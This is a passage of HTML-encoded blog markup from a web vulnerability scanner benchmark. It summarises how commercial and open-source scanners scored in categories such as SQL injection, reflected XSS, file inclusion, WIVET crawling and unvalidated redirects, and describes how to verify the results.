came out &lt;b&gt;FIRST&lt;/b&gt; in &lt;b&gt;WIVET&lt;/b&gt; (along with 3 others), &lt;b&gt;SQL Injection&lt;/b&gt;
(along with 4 others), &lt;b&gt;Reflected XSS&lt;/b&gt; (along with 10 others), got great
results in many other categories, but didn&#39;t get a good score in the new
unvalidated redirect category.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;Syhunt Dynamic&lt;/b&gt; – Syhunt &lt;b&gt;dramatically&lt;/b&gt;
improved their &lt;b&gt;WIVET&lt;/b&gt; score (came out &lt;b&gt;FIRST&lt;/b&gt;, along with 3 others),
and slightly improved other scores as well (LFI, etc). They got a mixed result
when scanning backup/hidden files, and didn&#39;t have a plugin to scan unvalidated
redirect test cases (at least as far as I could tell). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Burp Suite Pro&lt;/u&gt;&lt;/b&gt; – Burp is the &lt;b&gt;undisputed
winner&lt;/b&gt; of the &lt;b&gt;(overall) versatility&lt;/b&gt; category, was the only &lt;b&gt;winner&lt;/b&gt;
in the &lt;b&gt;input vector support&lt;/b&gt; category (followed closely by NTO, and less
closely by Appscan, Webinspect and IronWASP), got &lt;b&gt;one&lt;/b&gt; of the &lt;b&gt;highest
scores&lt;/b&gt; in detecting &lt;b&gt;Backup/Hidden Files&lt;/b&gt; (relative), and decent
scores in many other categories. It also came out &lt;b&gt;FIRST&lt;/b&gt; in the &lt;b&gt;SQL
Injection&lt;/b&gt; (along with 4 others) and &lt;b&gt;Reflected XSS&lt;/b&gt; (along with 10
others) categories, and &lt;b&gt;dramatically improved&lt;/b&gt; its &lt;b&gt;RFI&lt;/b&gt; score, but alas,
didn&#39;t get a good score in the WIVET test (same as last year). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;WebCruiser&lt;/u&gt;&lt;/b&gt; – No significant changes
compared to previous versions in the tested categories.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;ParosPro&lt;/u&gt;&lt;/b&gt; – was not retested, since no
updates were released, so it has identical results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;JSky&lt;/u&gt;&lt;/b&gt; – was not retested, since no updates
were released, so it has identical results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Ammonite&lt;/u&gt;&lt;/b&gt;
– was not retested, since no updates were released, so it has identical
results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following list presents a summary of changes in the
detection accuracy and coverage of &lt;b&gt;Opensource/Free&lt;/b&gt; tools that were
tested in the previous benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;ZAP&lt;/u&gt;&lt;/b&gt; – ZAP significantly improved almost
all of its results. It implemented a new AJAX crawling feature that &lt;b&gt;dramatically&lt;/b&gt;
improved its &lt;b&gt;WIVET&lt;/b&gt; score (&lt;b&gt;highest among opensource&lt;/b&gt;) – but this
feature optional and requires time to use. It came out &lt;b&gt;FIRST&lt;/b&gt; in the &lt;b&gt;Reflected
XSS&lt;/b&gt; category (along with 10 others), got one of the highest scores in SQL
Injection, Remote File Inclusion and Local File Inclusion, as well as a decent
result in many others categories. If you take into account the external &lt;b&gt;GoF&lt;/b&gt;
plugin, ZAP is also the &lt;b&gt;winner&lt;/b&gt; of the &lt;b&gt;Backup/Hidden file&lt;/b&gt;
detection category, although I&#39;m leaving that interpretation to the reader. ZAP
however, didn&#39;t get a good score when tested against unvalidated redirect test
cases.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;IronWASP&lt;/u&gt;&lt;/b&gt; – Although IronWASP too had a new
AJAX crawling feature, it was released too late for me to test it properly, and
in my opinion, required a little more polishing (although rumors say it gets an
insane WIVET score). It did however, make a clean (and unexpected) take away by
being the &lt;b&gt;only winner&lt;/b&gt; in the new and hidden &lt;b&gt;Unvalidated Redirect&lt;/b&gt;
category, with an impressive score that detected test cases that no other tool
has. It also &lt;b&gt;co-won&lt;/b&gt; the &lt;b&gt;Reflected XSS&lt;/b&gt; category (along with 10
others), and got some great results in many other tests. Due to technical
difficulties, I still don&#39;t a WIVET score for it, but hopefully will have soon.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;Skipfish&lt;/b&gt; – &lt;b&gt;Skipfish is back in the game.&lt;/b&gt;&amp;nbsp;Although previous version were relatively buggy, the currently tested version
had very impressive results, notable result consistency (which unfortunately I
did not measure)&lt;b&gt;, and a dramatic improvement&lt;/b&gt; in almost every test
category I used it in. It got very impressive results in many categories, and
also a relatively very high results in the unvalidated redirect category.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Vega&lt;/u&gt;&lt;/b&gt; – Vega was definitely a surprising
player in this benchmark. It came out &lt;b&gt;FIRST&lt;/b&gt; in both &lt;b&gt;Reflected XSS&lt;/b&gt;
(along with 10 others) and &lt;b&gt;Remote File Inclusion&lt;/b&gt; (along with 4 others). It
got a &lt;b&gt;fantastic WIVET&lt;/b&gt; &lt;b&gt;result for an open source tool&lt;/b&gt; (the best opensource
result without using a visible browser – something no other opensource tool
with good result did – worth reusing for other java tools), and got &lt;b&gt;very
impressive results&lt;/b&gt; in both the &lt;b&gt;Local File Inclusion&lt;/b&gt; (although with
lots of false positives) and SQL Injection. Sadly enough, it didn&#39;t have
plugins for unvalidated redirect or backup/hidden files that I could test.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Arachni&lt;/u&gt;&lt;/b&gt; – although anyone that will
install and use the latest version of arachni will immediately notice a
significant improvement in usability – a very impressive improvement if I might
add, and probably the most consistent behavior I saw – and unfortunately did
not measure (the idea behind the &quot;&lt;b&gt;AutoThrottle&lt;/b&gt;&quot; feature is
very interesting – and probably responsible for some of the consistent results –
since it got the same results regardless of how many URLs it scanned – very
rare in this industry), a bug in the XSS plugins seemed to reduce its score in
that category in comparison to the previous assessment, and another bug caused
the backup/hidden file detection plugin not to function at all. It still came
out &lt;b&gt;FIRST &lt;/b&gt;in the &lt;b&gt;Remote File Inclusion&lt;/b&gt; test (along with 4
others), improved some other results, and got the &lt;b&gt;third best score&lt;/b&gt; in
the NEW &lt;b&gt;Unvalidated Redirect&lt;/b&gt; category (along with Webinspect), and also got
me thinking on how easy it is to start a new SAAS business just by using it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;W3AF&lt;/u&gt;&lt;/b&gt; – The development version of W3AF had
several bugs that affected its score, and in fact, some results were actually
worse than the last benchmark (bugs were reported to the vendor). It did
however, still manage to surprise and get the best score for an opensource tool
in the &lt;b&gt;Unvalidated Redirect&lt;/b&gt; category (and second best score in that
category in total), a relatively good result in the Backup/Hidden File
detection category, and a couple of other results that were impressive,
especially in the context of the open-source industry (wivet, features).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;WATOBO&lt;/u&gt;&lt;/b&gt; – WATOBO &lt;b&gt;significantly improved&lt;/b&gt;
both its &lt;b&gt;SQL Injection&lt;/b&gt; and &lt;b&gt;Reflected XSS&lt;/b&gt; scores, got the same
scores in LFI, and got above average (relative) results in backup/hidden file
detection (which were generally bad to mediocre for most tools), but at the time
of the test did not have any RFI or Unvalidated Redirect features I could test.
&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;WAPITI&lt;/u&gt;&lt;/b&gt; – those who recall this tool which
got surprisingly high scores in previous benchmarks, would be delighted to know
that the project has been recently &lt;b&gt;revived&lt;/b&gt; and that a new version was
released. It got relatively good results (impressive WIVET for an opensource
tool), as well as improvement in almost every category. It did however, have a
hard time with the Backup/Hidden file category in which it got a low score.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;N-Stalker 2012 FE&lt;/u&gt;&lt;/b&gt; Significantly improved
its Reflected XSS Score compared to the previous benchmark. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Netsparker Community/Free Edition&lt;/u&gt;&lt;/b&gt; got some
slight improvements in some of its scores, and still has one of the best WIVET
scores for a free tool, but in the overall, there were no major changes
compared to the previous benchmark. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) SQLMap, WebSecurify, Acunetix FE and a couple of other
projects were not retested, and most of the features of Syhunt Mini, AndiParos
and Paros were not retested (although the latter three got some new results for
unvalidated redirect and backup/hidden files).&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-indent: -18pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;22. Opensource vs. Commercial - Insights?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The conclusions I have this year in relation to the open
source vs. commercial tools enigma are not as decisive compared to the previous
year.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Part of that is because I didn&#39;t yet completed all the
analysis processes I planned, and part of it because there really was a
significant improvement in the open source industry (and without taking lightly
the significant improvements that took place in the commercial section).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Projects such as ZAP and IronWASP &lt;b&gt;started supporting
scanning input delivery methods of modern web applications&lt;/b&gt;, including
JSON/AJAX, XML, and even nearly unique vectors such as OData and GWT, that even
most commercial vendors don&#39;t support.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Projects like W3AF have long ago been &lt;b&gt;almost&lt;/b&gt; as
feature rich as Webinspect and Appscan (although they still lack stability),
Vega is coming closer to having a crawling mechanism that can produce similar results
to that of a commercial vendor, and if I were &lt;b&gt;Qualys&lt;/b&gt; (or any other cloud
vendor), I would watch the Improvement of the Arachni project &lt;b&gt;CLOSELY.
Seriously – Install it and give it a shot… The results don&#39;t emphasize the
maturity level it got to.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;However, in sheer numbers, as an overall solution, most open
source tools still lag &lt;b&gt;a bit&lt;/b&gt; behind some of the major commercial
players, at least if you take into account all the categories… although I admit
that I don&#39;t say that with the same confidence as I did before, and I believe
that further analysis is required to get to a practical conclusion.&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-indent: -18pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;23. Verifying the Benchmark Results&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results of the benchmark can be verified by replicating
the scan methods described in the scan log of each scanner (accessible in &lt;b&gt;&lt;a href=&quot;http://sectoolmarket.com/&quot;&gt;sectoolmarket&lt;/a&gt;&lt;/b&gt; through the version link
of each product), and by testing the scanner against &lt;a href=&quot;https://code.google.com/p/wavsep/&quot;&gt;WAVSEP v1.5&lt;/a&gt; (obtained from the &lt;a href=&quot;https://sourceforge.net/projects/wavsep/&quot;&gt;sourceforge WAVSEP repository&lt;/a&gt;)
and &lt;a href=&quot;https://code.google.com/p/wivet/&quot;&gt;WIVET v3-revision148&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The same methodology can be used to assess vulnerability
scanners that were not included in the benchmark.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;24. So What&#39;s Next?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;During this research, which I have been conducting for the
past 18 months or so (7 of those just to gather the results you are currently
seeing), I gathered a ton of information.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Due to my consistently tight schedule, too many adventurous endeavors
and the fact that I didn&#39;t want to delay the publication any longer, I didn&#39;t
publish A LOT of content that was gathered, so in the next couple of weeks I&#39;m
going to try and wrap it up so it could come to fruition ASAP…in my opinion,
the conclusions from the unpublished content can be very interesting for the
technological trends in this industry.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The benchmark was branded as &lt;b&gt;part I&lt;/b&gt; for a reason, and
although I might add the results of additional products soon, in the upcoming
weeks, I plan to focus on trying to see how much effort will be required to
